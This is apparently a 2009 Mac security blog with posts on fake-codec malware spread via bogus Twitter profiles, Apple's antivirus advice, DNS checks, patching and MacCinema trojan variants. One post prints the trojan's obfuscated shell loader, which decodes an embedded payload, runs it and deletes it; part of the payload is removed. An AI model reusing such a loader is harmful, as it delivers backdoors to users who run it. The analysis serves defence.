I love reading emails especially when with background =)
If you just double click it, then you are not infected. However, if you follow and successfully finish the installation process. Then, you are definitely infected!
July 7, 2009
June 27, 2009
Bogus Micro-Blog Profiles
I just read my RSS feeds and found interesting write-up from Peter @ Intego about “Hacking twitter spread Mac malware“.
In the past, we have seen bogus blog profiles such as in blogspot massively created to distribute FakeCodec malwares – both serving for Windows and Macintosh platform. To reach more internet user, these bogus profiles are spammed in various legitimate online communities and social networking walls, as well as uses analytics to poison google search results. These has been very effective distribution vector for these attackers, even up to this time. An example for this is celebnudestars.net, which receives thousands of traffic daily.
Now, the social networking craze has lead to a new dimension as this year micro-blogging sinks in with dramatic increase in popularity. I have discussed this in my previous blog “The Allure of Social Networking“.
Micro-blogging such as the most popular Twitter, is now a huge target. Similar to blog, attackers started to auto-generate bogus profile to carry out malicious task.
Early this month, Dancho Danchev published his findings @ Zdnet blog titled “Cybercriminals hijack Twitter trending topics to serve malware”, explaining list of keywords that leads to these bogus profile, which links to fake codec malware servers.
Malicious user may take advantage of popular trend, just like the screenshot below (sourced: http://www.stoptwitterspam.com)
In a nutshell, it is evident that these organized group has resources already deployed and actively operating, now it is a matter of time that we’ll be seeing Mac malware serving through this vector.
It is important that users practice safe computing, by applying security update and making sure security scanners and tools are turned-on.
June 20, 2009
Snow Leopard Recommends Antivirus
Apple updated its web pages as Snow Leopard is expected to be released this September.
A notable change is in Security section, where Apple admits that “no system can be 100 percent immune from every threat” and acknowledges that “antivirus software may offer additional protection”.
Interestingly, prior to this change is a strong campaign that every “Mac is Secure”. (Thank goodness, I have kept a copy of those pages because I have noted and reference a link in my abstract here.)
If you’ll reckon this page last year (below) – this has caught massive media attention as Apple recommends Antivirus which is contrary to its security campaign. The attention further escalates when Apple removed and said that it was “incurrate” – referring that it is old and not updated. (Google “Apple removes anti-virus” for further story).
Although, I think users should understand here is that “Security is a Process and NOT a Product”. Evidently, gaining popularity delivers both worlds – Good and Bad. Obviously, users with confidential information stored in their hard drives and performs financial transaction online must understand that it is users’ responsibility to protect themselves from outside threats especially with the growing numbers of organized cyber-crimes.
Visualizing OS X Threat Internet Distribution
This has been discussed here and added the graph @ http://secviz.org/
June 10, 2009
Updated MacCinema
Last week, I have spotted a modified version of MacCinema. It was not significant, the modification was purely to avoid scanners detection.
The script looks like this:
#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
dne
`
``@"R5V9IY&(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*H
"%$8X0"*"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03M
****content removed****
LU"(B%&=N]F<C!6/T-7:X5F"B,G;)UR9UQ&4@079N)79TY62ODG<A)G8IQT+M
BT#:T%&<*(R8AU69L!'<A)2/,ED5%I@(R@C+T8C+S83,N,3,R(2/21$1!!52M
agazagiz 666 lala
Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumbled to these malicious sites from Google search.
Some lures Mac users promising free downloads of full version softwares, cracks, serials, activators, generators, keys, fixes – just like the screenshot below. 
…while other links to Mac videos like this PornTube below.
There are malware serving sites that is bit aggressive, where it does not ask user to download the DMG files instead it automatically downloads and mounts – as it is turned on by default, you can disable automount by following this instruction:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ’safe’ files after downloading” box
5. Close Safari’s preferences
This instruction has been previously discussed here.
Stay safe!
OS X Tips: How To Check Your DNS Settings
Option 1 - Locate and click the Apple icon in your upper left corner and click “System Preferences”, then “Network” and search for “DNS Server”. If you want to modify and remove malicious entry, you can simply click the box and input the right address. However, if you are not sure simply try release & renew as instructed below.
Option 2 - Open Terminal (~/Applications/Utilities or you can search it using spotlight)
From the terminal, type “cat /etc/resolv.conf”. This command will return your domain and name servers.
Another command is, “scutil –-dns”. Check resolver #1, this often returns domain and name servers as well.
Release and Renew to remove malicious DNS entry
From the terminal, type the following:
sudo ifconfig en1 down
sudo ifconfig en1 up
**Note: sudo means run as root user, so it will require you to input password. Also, en1 is often interfaced to LAN and en0 to Wireless – just try and see which one will work.
Another way is to unplug your internet connnection and reconnect. This will also work (”,)
May 27, 2009
Window Shortcut – LNK File Format
Figure 01 – LNK Top Level File Structure
A computer shortcut (shortcut) is a small file containing a target URI or the name of a target program file that the shortcut represents. [wiki]
Microsoft Windows uses .lnk as the filename extension for shortcuts to local files, and .URL for shortcuts to remote files, like web pages.
Thanks to Jesse Hager for creating the specification document. [PDF]
As observed, LNK trojan downloaders takes advantage of Command line string to perform malicious activity.
May 16, 2009
OS X users, please patch!
If you haven’t patch yet, then please do.
How do I know if I’m patched?
Click “About This Mac” and it should display Mac OS X version 10.5.7. You can do the same if you are using Safari by clicking “About Safari”, this should display Safari 4 (beta).
Why it is important to patch?
There are critical vulnerabilities that could allow malicious user (hacker, malware) to snoop and steal your information in background. Let me sight examples from vulnerabilities that has captured media attention (so, it means many attackers are aware of this).
Safari RSS
Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.6, Mac OS X Server v10.5.6
Solution: The critical issue has been addressed in Security Update 2009-001 for Mac users and Safari 3.2.2 for Windows.
Impact: Accessing a maliciously crafted feed: URL may lead to arbitrary code execution.
Attacker can easily craft URL and execute javascript – and this could expose your personal and sensitive information.
Disk Images
Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6
Solution: The critical issue has been addressed in Security Update 2009-002
Impact: Mounting a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution.
This is very critical the fact that browser like Safari has enabled “Open safe files after downloading” by default. You can turn off this option in Safari by following the instructions below:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ’safe’ files after downloading” box
5. Close Safari’s preferences
May 7, 2009
MacCinema slight modification
A slightly modified variant of MacCinema was spotted in “MacPlay.dmg”. Once you execute it, it will still display MacCinema installer. However, few modification was found in preinstall & preupgrade scripts as shown in Figure 01.
Obviously, attackers are trying to maximize these threats. The obfuscated data will extract another script, which we already seen it from previous variant.
This Trojan has been in-the-wild for months now and as it continuously proliferates in the internet, new Macintosh users are often found falling into its tricks.
Stay away from this threat!
May 5, 2009
Apple profiles “Twitter”
Apple profiles series of companies that uses Mac and one of them is Twitter – profile title “Twitter. Triumph of humanity“.
It’s nice story although when you think of the recent series of successful attacks (Mikeyy worm and exposure of Twitter Admin Panel), you’ll probably react this way …
“Aha?!, Interesting!”
